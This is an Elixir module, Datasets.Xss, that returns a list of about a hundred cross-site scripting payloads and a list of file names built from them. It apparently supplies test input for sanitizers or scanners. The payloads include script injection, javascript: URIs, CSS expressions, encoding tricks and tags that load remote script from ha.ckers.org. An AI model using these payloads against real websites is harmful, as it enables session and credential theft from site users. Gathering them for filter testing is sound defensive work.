defmodule Datasets.Xss do
@moduledoc """
XSS dataset module.
"""
@spec data :: [String.t(), ...]
def data do
[
"';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//\";\nalert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--\n></SCRIPT>\">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>",
"'';!--\"<XSS>=&{()}",
"<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>",
"<IMG SRC=\"javascript:alert('XSS');\">",
"<IMG SRC=javascript:alert('XSS')>",
"<IMG SRC=JaVaScRiPt:alert('XSS')>",
"<IMG SRC=javascript:alert(\"XSS\")>",
"<IMG SRC=`javascript:alert(\"RSnake says, 'XSS'\")`>",
"<IMG \"\"\"><SCRIPT>alert(\"XSS\")</SCRIPT>\">",
"<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>",
"<IMG SRC=javascript:alert(\n'XSS')>",
"<IMG SRC=javascript:a&\n#0000108ert('XSS')>",
"<IMG SRC=javascript:alert('XSS')>",
"<IMG SRC=\"jav\tascript:alert('XSS');\">",
"<IMG SRC=\"jav	ascript:alert('XSS');\">",
"<IMG SRC=\"jav
ascript:alert('XSS');\">",
"<IMG SRC=\"jav
ascript:alert('XSS');\">",
"perl -e 'print \"<IMG SRC=java\\0script:alert(\\\"XSS\\\")>\";' > out",
"<IMG SRC=\"  javascript:alert('XSS');\">",
"<SCRIPT/XSS SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>",
"<BODY onload!#$%&()*~+-_.,:;?@[/|\\]^`=alert(\"XSS\")>",
"<SCRIPT/SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>",
"<<SCRIPT>alert(\"XSS\");//<</SCRIPT>",
"<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >",
"<SCRIPT SRC=//ha.ckers.org/.j>",
"<IMG SRC=\"javascript:alert('XSS')\"",
"<iframe src=http://ha.ckers.org/scriptlet.html <",
"\\\";alert('XSS');//",
"</TITLE><SCRIPT>alert(\"XSS\");</SCRIPT>",
"<INPUT TYPE=\"IMAGE\" SRC=\"javascript:alert('XSS');\">",
"<BODY BACKGROUND=\"javascript:alert('XSS')\">",
"<IMG DYNSRC=\"javascript:alert('XSS')\">",
"<IMG LOWSRC=\"javascript:alert('XSS')\">",
"<STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS</br>",
"<IMG SRC='vbscript:msgbox(\"XSS\")'>",
"<IMG SRC=\"livescript:[code]\">",
"<BODY ONLOAD=alert('XSS')>",
"<BGSOUND SRC=\"javascript:alert('XSS');\">",
"<BR SIZE=\"&{alert('XSS')}\">",
"<LINK REL=\"stylesheet\" HREF=\"javascript:alert('XSS');\">",
"<LINK REL=\"stylesheet\" HREF=\"http://ha.ckers.org/xss.css\">",
"<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>",
"<META HTTP-EQUIV=\"Link\" Content=\"<http://ha.ckers.org/xss.css>; REL=stylesheet\">",
"<STYLE>BODY{-moz-binding:url(\"http://ha.ckers.org/xssmoz.xml#xss\")}</STYLE>",
"<STYLE>@im\\port'\\ja\\vasc\\ript:alert(\"XSS\")';</STYLE>",
"<IMG STYLE=\"xss:expr/*XSS*/ession(alert('XSS'))\">",
"exp/*<A STYLE='no\\xss:noxss(\"*//*\");\nxss:ex/*XSS*//*/*/pression(alert(\"XSS\"))'>",
"<STYLE TYPE=\"text/javascript\">alert('XSS');</STYLE>",
"<STYLE>.XSS{background-image:url(\"javascript:alert('XSS')\");}</STYLE><A CLASS=XSS></A>",
"<STYLE type=\"text/css\">BODY{background:url(\"javascript:alert('XSS')\")}</STYLE>",
"<XSS STYLE=\"xss:expression(alert('XSS'))\">",
"<XSS STYLE=\"behavior: url(xss.htc);\">",
"¼script¾alert(¢XSS¢)¼/script¾",
"<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">",
"<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\">",
"<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\">",
"<IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME>",
"<FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>",
"<TABLE BACKGROUND=\"javascript:alert('XSS')\">",
"<TABLE><TD BACKGROUND=\"javascript:alert('XSS')\">",
"<DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">",
"<DIV STYLE=\"background-image:\\0075\\0072\\006C\\0028'\\006a\\0061\\0076\\0061\\0073\\0063\\0072\\0069\\0070\\0074\\003a\\0061\\006c\\0065\\0072\\0074\\0028.1027\\0058.1053\\0053\\0027\\0029'\\0029\">",
"<DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">",
"<DIV STYLE=\"width: expression(alert('XSS'));\">",
"<!--[if gte IE 4]>\n <SCRIPT>alert('XSS');</SCRIPT>\n <![endif]-->",
"<BASE HREF=\"javascript:alert('XSS');//\">",
"<OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http://ha.ckers.org/scriptlet.html\"></OBJECT>",
"EMBED SRC=\"http://ha.ckers.Using an EMBED tag you can embed a Flash movie that contains XSS. Click here for a demo. If you add the attributes allowScriptAccess=\"never\" and allownetworking=\"internal\" it can mitigate this risk (thank you to Jonathan Vanasco for the info).:\norg/xss.swf\" AllowScriptAccess=\"always\"></EMBED>",
"<EMBED SRC=\"data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\" type=\"image/svg+xml\" AllowScriptAccess=\"always\"></EMBED>",
"a=\"get\";\nb=\"URL(\\\"\";\nc=\"javascript:\";\nd=\"alert('XSS');\\\")\";\neval(a+b+c+d);",
"<XML ID=\"xss\"><I><B><IMG SRC=\"javas<!-- -->cript:alert('XSS')\"></B></I></XML>\n<SPAN DATASRC=\"#xss\" DATAFLD=\"B\" DATAFORMATAS=\"HTML\"></SPAN>",
"<XML SRC=\"xsstest.xml\" ID=I></XML>\n<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>",
"<HTML><BODY>\n<?xml:namespace prefix=\"t\" ns=\"urn:schemas-microsoft-com:time\">\n<?import namespace=\"t\" implementation=\"#default#time2\">\n<t:set attributeName=\"innerHTML\" to=\"XSS<SCRIPT DEFER>alert(\"XSS\")</SCRIPT>\">\n</BODY></HTML>",
"<SCRIPT SRC=\"http://ha.ckers.org/xss.jpg\"></SCRIPT>",
"<!--#exec cmd=\"/bin/echo '<SCR'\"--><!--#exec cmd=\"/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'\"-->",
"<? echo('<SCR)';\necho('IPT>alert(\"XSS\")</SCRIPT>'); ?>",
"<IMG SRC=\"http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode\">",
"<META HTTP-EQUIV=\"Set-Cookie\" Content=\"USERID=<SCRIPT>alert('XSS')</SCRIPT>\">",
"<HEAD><META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-7\"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-",
"<SCRIPT a=\">\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>",
"<SCRIPT =\">\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>",
"<SCRIPT a=\">\" '' SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>",
"<SCRIPT \"a='>'\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>",
"<SCRIPT a=`>` SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>",
"<SCRIPT a=\">'>\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>",
"<SCRIPT>document.write(\"<SCRI\");</SCRIPT>PT SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>",
"<A HREF=\"http://66.102.7.147/\">XSS</A>",
"<A HREF=\"http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\">XSS</A>",
"<A HREF=\"http://1113982867/\">XSS</A>",
"<A HREF=\"http://0x42.0x0000066.0x7.0x93/\">XSS</A>",
"<A HREF=\"http://0102.0146.0007.00000223/\">XSS</A>",
"<A HREF=\"h\ntt\tp://6\t6.000146.0x7.147/\">XSS</A>",
"<A HREF=\"//www.google.com/\">XSS</A>",
"<A HREF=\"//google\">XSS</A>",
"<A HREF=\"http://ha.ckers.org@google\">XSS</A>",
"<A HREF=\"http://google:ha.ckers.org\">XSS</A>",
"<A HpREF=\"http://google.com/\">XSS</A>",
"<A HREF=\"http://www.google.com./\">XSS</A>",
"<A HREF=\"javascript:document.location='http://www.google.com/'\">XSS</A>",
"<A HREF=\"http://www.gohttp://www.google.com/ogle.com/\">XSS</A>"
]
end
@spec files :: [String.t(), ...]
def files() do
[
"<BGSOUND SRC=\"javascript:alert('XSS');\">.txt",
"<BODY BACKGROUND=\"javascript:alert('XSS')\">.txt",
"<BODY ONLOAD=alert('XSS')>.txt",
"<BR SIZE=\"&{alert('XSS')}\">.txt",
"<DIV STYLE=\"background-image:\\0075\\0072\\006C\\0028'\\006a\\0061\\0076\\0061\\0073\\0063\\0072\\0069\\0070\\0074\\003a\\0061\\006c\\0065\\0072\\0074\\0028.1027\\0058.1053\\0053\\0027\\0029'\\0029\">.txt",
"<DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">.txt",
"<DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">.txt",
"<DIV STYLE=\"width: expression(alert('XSS'));\">.txt",
"<IMG DYNSRC=\"javascript:alert('XSS')\">.txt",
"<IMG LOWSRC=\"javascript:alert('XSS')\">.txt",
"<IMG SRC=javascript:a&n#0000108ert('XSS')>.txt",
"<IMG SRC=javascript:alert(n'XSS')>.txt",
"<IMG SRC=\"  javascript:alert('XSS');\">.txt",
"<IMG SRC=`javascript:alert(\"RSnake says, 'XSS'\")`>.txt",
"<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>.txt",
"<IMG SRC=\"javascript:alert('XSS');\">.txt",
"<IMG SRC=\"javascript:alert('XSS')\".txt",
"<IMG SRC=javascript:alert('XSS')>.txt",
"<IMG SRC=javascript:alert(\"XSS\")>.txt",
"<IMG SRC=JaVaScRiPt:alert('XSS')>.txt",
"<IMG SRC=\"javtascript:alert('XSS');\">.txt",
"<IMG SRC=\"jav	ascript:alert('XSS');\">.txt",
"<IMG SRC=\"jav
ascript:alert('XSS');\">.txt",
"<IMG SRC=\"jav
ascript:alert('XSS');\">.txt",
"<IMG SRC=\"livescript:[code]\">.txt",
"<IMG SRC='vbscript:msgbox(\"XSS\")'>.txt",
"<IMG SRC=javascript:alert('XSS')>.txt",
"<INPUT TYPE=\"IMAGE\" SRC=\"javascript:alert('XSS');\">.txt",
"<LINK REL=\"stylesheet\" HREF=\"javascript:alert('XSS');\">.txt",
"<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">.txt",
"perl -e 'print \"<IMG SRC=java\\0script:alert(\\\"XSS\\\")>\";' > out.txt",
"<TABLE BACKGROUND=\"javascript:alert('XSS')\">.txt",
"<TABLE><TD BACKGROUND=\"javascript:alert('XSS')\">.txt",
"xss-data.tmp",
"<XSS STYLE=\"behavior: url(xss.htc);\">.txt",
"<XSS STYLE=\"xss:expression(alert('XSS'))\">.txt",
"'';!--\"<XSS>=&{()}.txt"
]
end
end
